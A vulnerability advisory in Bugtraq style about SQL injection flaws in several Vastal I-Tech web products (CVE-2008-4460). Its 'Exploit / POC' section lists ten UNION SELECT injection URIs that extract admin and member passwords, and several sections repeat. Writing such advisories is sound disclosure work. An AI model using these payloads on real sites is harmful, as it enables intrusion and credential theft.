Multiple Vastal I-Tech Products Multiple SQL Injection Vulnerabilities
BID:31033
Info
Multiple Vastal I-Tech Products Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 31033 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4460 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 05 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | Stack and DeViL iRaQ |
| Vulnerable: |
Vastal I-Tech Visa Zone 0 Vastal I-Tech Toner Cart 0 Vastal I-Tech Software Zone 0 Vastal I-Tech Share Zone 0 Vastal I-Tech MMORPG Zone 0 Vastal I-Tech Mag Zone 0 Vastal I-Tech Jobs Zone 0 Vastal I-Tech Freelance Zone 0 Vastal I-Tech DVD Zone 0 Vastal I-Tech Cosmetics Zone 0 |
| Not Vulnerable: | |
Discussion
Multiple Vastal I-Tech Products Multiple SQL Injection Vulnerabilities
Multiple Vastal I-Tech products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise one of the applications, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following products are affected:
Share Zone
Toner Cart
Visa Zone
Software Zone
Jobs Zone
MMORPG
Mag Zone
Freelance Zone
Cosmetics Zone
DVD Zone
Multiple Vastal I-Tech products are prone to multiple SQL-injection vulnerabilities because they fail to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise one of the applications, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following products are affected:
Share Zone
Toner Cart
Visa Zone
Software Zone
Jobs Zone
MMORPG
Mag Zone
Freelance Zone
Cosmetics Zone
DVD Zone
Exploit / POC
Multiple Vastal I-Tech Products Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
http://www.example.com/show_series_ink.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
http://www.example.com/view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
http://example.com/view_product.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
http://www.example.com/view_product.php?cat_id=-1/**/UNION/**/SELECT/**/concat_ws(0x3a,admin_user,admin_password)/**/from/**/admin_users/*
http://www.example.com/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/*
http://www.example.com/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/*
http://www.example.com/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
http://www.example.com/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*
http://www.example.com/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
http://www.example.com/show_series_ink.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
http://www.example.com/view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users
http://example.com/view_product.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
http://www.example.com/view_product.php?cat_id=-1/**/UNION/**/SELECT/**/concat_ws(0x3a,admin_user,admin_password)/**/from/**/admin_users/*
http://www.example.com/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/*
http://www.example.com/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/*
http://www.example.com/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*
http://www.example.com/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*
http://www.example.com/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*
Solution / Fix
Multiple Vastal I-Tech Products Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Multiple Vastal I-Tech Products Multiple SQL Injection Vulnerabilities
References:
References:
- Vendor Homepage (Vastal I-Tech)